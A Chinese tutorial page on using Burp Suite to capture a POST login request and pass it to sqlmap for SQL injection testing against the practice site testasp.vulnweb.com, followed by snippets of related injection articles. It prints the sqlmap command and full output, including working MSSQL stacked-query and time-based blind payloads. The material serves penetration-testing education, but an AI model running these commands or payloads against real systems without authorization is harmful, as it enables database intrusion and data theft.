使用Burpsuite辅助Sqlmap进行POST注入测试

原文地址:http://www.freebuf.com/tools/2311.html

我们在使用Sqlmap进行post型注入时,经常会出现请求遗漏导致注入失败的情况。

这里分享一个小技巧,即结合burpsuite来使用sqlmap,用这种方法进行post注入测试会更准确,操作起来也非常容易。

1. 浏览器打开目标地址 http://testasp.vulnweb.com/Login.asp
2. 配置burp代理(127.0.0.1:8080)以拦截请求
3. 点击login表单的submit按钮
4. 如下图,这时候Burp会拦截到了我们的登录POST请求

5. 把这个post请求复制为txt, 我这命名为search-test.txt 然后把它放至sqlmap目录下
6. 运行sqlmap并使用如下命令:./sqlmap.py -r search-test.txt -p tfUPass,这里参数 -r 是让sqlmap加载我们的post请求rsearch-test.txt,而-p 大家应该比较熟悉,指定注入用的参数。

./sqlmap.py -r search-test.txt -p tfUPass

sqlmap/0.9 - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[*] starting at: 13:26:52

[13:26:52] [INFO] parsing HTTP request from ‘search-test.txt‘
[13:26:52] [WARNING] the testable parameter ‘tfUPass‘ you provided is not into the GET
[13:26:52] [WARNING] the testable parameter ‘tfUPass‘ you provided is not into the Cookie
[13:26:52] [INFO] using ‘/home/testuser/sqlmap/output/testasp.vulnweb.com/session‘ as session file
[13:26:52] [INFO] resuming injection data from session file
[13:26:52] [WARNING] there is an injection in POST parameter ‘tfUName‘ but you did not provided it this time
[13:26:52] [INFO] testing connection to the target url
[13:26:53] [INFO] testing if the url is stable, wait a few seconds
[13:26:55] [INFO] url is stable
[13:26:55] [WARNING] heuristic test shows that POST parameter ‘tfUPass‘ might not be injectable
[13:26:55] [INFO] testing sql injection on POST parameter ‘tfUPass‘
[13:26:55] [INFO] testing ‘AND boolean-based blind - WHERE or HAVING clause‘
[13:27:02] [INFO] testing ‘MySQL >= 5.0 AND error-based - WHERE or HAVING clause‘
[13:27:05] [INFO] testing ‘PostgreSQL AND error-based - WHERE or HAVING clause‘
[13:27:07] [INFO] testing ‘Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause‘
[13:27:10] [INFO] testing ‘Oracle AND error-based - WHERE or HAVING clause (XMLType)‘
[13:27:12] [INFO] testing ‘MySQL > 5.0.11 stacked queries‘
[13:27:14] [INFO] testing ‘PostgreSQL > 8.1 stacked queries‘
[13:27:17] [INFO] testing ‘Microsoft SQL Server/Sybase stacked queries‘
[13:27:30] [INFO] POST parameter ‘tfUPass‘ is ‘Microsoft SQL Server/Sybase stacked queries‘ injectable
[13:27:30] [INFO] testing ‘MySQL > 5.0.11 AND time-based blind‘
[13:27:31] [INFO] testing ‘PostgreSQL > 8.1 AND time-based blind‘
[13:27:31] [INFO] testing ‘Microsoft SQL Server/Sybase time-based blind‘
[13:27:42] [INFO] POST parameter ‘tfUPass‘ is ‘Microsoft SQL Server/Sybase time-based blind‘ injectable
[13:27:42] [INFO] testing ‘MySQL UNION query (NULL) - 1 to 10 columns‘
[13:27:48] [INFO] testing ‘Generic UNION query (NULL) - 1 to 10 columns‘
[13:27:48] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
sqlmap got a 302 redirect to /Search.asp - What target address do you want to use from now on? http://testasp.vulnweb.com:80/Login.asp (default) or provide another target address based also on the redirection got from the application

>
[13:27:58] [INFO] target url appears to be UNION injectable with 2 columns
POST parameter ‘tfUPass‘ is vulnerable. Do you want to keep testing the others? [y/N] N
sqlmap identified the following injection points with a total of 68 HTTP(s) requests:
---
Place: POST
Parameter: tfUPass
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: tfUName=test&tfUPass=test‘; WAITFOR DELAY ‘0:0:5‘;-- AND ‘mPfC‘=‘mPfC

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: tfUName=test&tfUPass=test‘ WAITFOR DELAY ‘0:0:5‘-- AND ‘wpkc‘=‘wpkc
---

[13:28:08] [INFO] testing MySQL
[13:28:09] [WARNING] the back-end DBMS is not MySQL
[13:28:09] [INFO] testing Oracle
[13:28:10] [WARNING] the back-end DBMS is not Oracle
[13:28:10] [INFO] testing PostgreSQL
[13:28:10] [WARNING] the back-end DBMS is not PostgreSQL
[13:28:10] [INFO] testing Microsoft SQL Server
[13:28:16] [INFO] confirming Microsoft SQL Server
[13:28:28] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
[13:28:28] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 42 times
[13:28:28] [INFO] Fetched data logged to text files under ‘/home/testuser/sqlmap/output/testasp.vulnweb.com‘

[*] shutting down at: 13:28:28
时间: 2024-10-09 20:03:19

使用Burpsuite辅助Sqlmap进行POST注入测试的相关文章

通过BurpSuite和sqlmap配合对dvwa进行sql注入测试和用户名密码暴力破解

0x1:工具和环境介绍 dvwa:渗透测试环境 BurpSuite:强大的WEB安全测试工具 sqlmap:强大的sql注入工具 以上工具和环境都在kali linux上安装和配置. 0x2:步骤说明 配置Burp Suite和浏览器. 这一步比较简单,主要是用来抓取用来sql注入的信息. 在Burp中设置proxy代理:127.0.0.1:8080,配置浏览器使用代理,这样浏览器的request信息就可以被Burp抓取了. 抓取登录信息 在Burp的Proxy界面可以抓取到浏览器访问的信息,如

利用sqlmap进行POST注入

利用sqlmap进行POST注入,常见的有三种方法: 注入方式一: 1.用Burp抓包,然后保存抓取到的内容.例如:保存为post.txt,然后把它放至某个目录下 2.列数据库: sqlmap.py -r "c:\Users\fendo\Desktop\post.txt" -p n --dbs注:-r表示加载一个文件,-p指定参数 其中出现了三次提示: it looks like the back-end DBMS is 'MySQL'. Do you want to skip tes

java web sql注入测试(3)---现象分析

那为什么出现以上问题呢?这是程序代码层控制不当导致的.如果web前端对输入数据控制严格,会对数据库进行操作的字符串,在客户端做敏感字符转义处理,或者在操作数据库的dao层,使用动态参数的sql,不使用拼接方式的sql,都可以防止该类问题的发生. 一般情况,如果测试人员了解dao层的具体设计,如果使用的就是非拼接方式的,基本是可以拦截大部分这些存在问题的sql了.而如果使用的是拼接方式,就可以好好的设计测试用例,进行测试了. 那又为什么非拼接方式就可以有效的防止SQL注入测试呢? 修改上部分核心代

SQL注入测试平台 SQLol -1. 简介与安装

最近下载了SQLol测试了一下,感觉挺好玩的,做一下记录. SQLol是一个可配置得SQL注入测试平台,它包含了一系列的挑战任务,让你在挑战中测试和学习SQL注入语句,SQLol还是比较有创意的项目. SQLol is now part of the Magical Code Injection Rainbow framework at http://github.com/SpiderLabs/MCIR and the standalone version will no longer be m

Burosuite抓包Sqlmap学习Sql注入

在sqlmap中加入--proyxy参数: --proxy "http://127.0.0.1:8080" 如下图所示: 回车以后sqlmap会自动抓到数据包: 我们选择向前(forward)即可: 可以看到参数ID的后面多了一些URL的编码.可以复制然后去解开看看. 简单学习.嘻嘻.每天进步一点点. THE END Burosuite抓包Sqlmap学习Sql注入

如何防范SQL注入——测试篇(转)

在上一篇文章<如何防范SQL注入-编程篇>中,我们讲了对于程序员而言,如何编码以防范代码存在SQL注入漏洞,那么,对于测试人员来说,如何测试SQL注入漏洞是否存在呢? 首先,我们将SQL注入攻击能分为以下三种类型: Inband:数据经由SQL代码注入的通道取出,这是最直接的一种攻击,通过SQL注入获取的信息直接反映到应用程序的Web页面上: Out-of-band:数据通过不同于SQL代码注入的方式获得(譬如通过邮件等) 推理:这种攻击是说并没有真正的数据传输,但攻击者可以通过发送特定的请求

对于sqli-labs基础篇全程使用sqlmap不用手工注入(七夕礼物!!!)

个人简介:萌新一枚,渣渣一个,全程划水,会喊六六 本文断断续续已经写了三天了,其中查过很多其他人的博文 但是发现大多数人关于sql-labs使用的都是手工注入, 由于自己太渣,只能去找工具去注入(QAQ) 希望各位大佬不要见怪呀!! 不论喜欢与否都可以留言哦!!!! 关于sqli-labs的解题技巧,使用sqlmap注入,尽量少使用手工注入的方式 关于sql-labs中的1-4我已经在另一篇文章中写出具体的过程: https://www.cnblogs.com/lxz-1263030049/p/

【sql注入测试】sqlmap的使用教程

1.先安装谷歌插件 谷歌浏览器安装附件中扩展程序:Omega,打开浏览器的设置-->  更多工具 --> 扩展程序-->打开开发者模式 原文地址:https://www.cnblogs.com/chenxiaomeng/p/12625353.html

sqlmap的安装和测试环境的搭建

1.sqlmap的官网 http://sqlmap.org/ 上的可以下载到最新的sqlmap版本 2.需要安装python2.7 可以去官网下载 https://www.python.org/,注意配置环境变量 3.测试sqlmap是否安装成功,解压sqlmap,进行其目录,进入cmd,运行python sqlmap.py 测试环境的搭建 注意尽量使用google chrome浏览器,因为它可以方便用使用快捷菜单的检查选项来查看HTML请求的具体细节 1.下载wampserver x64 注意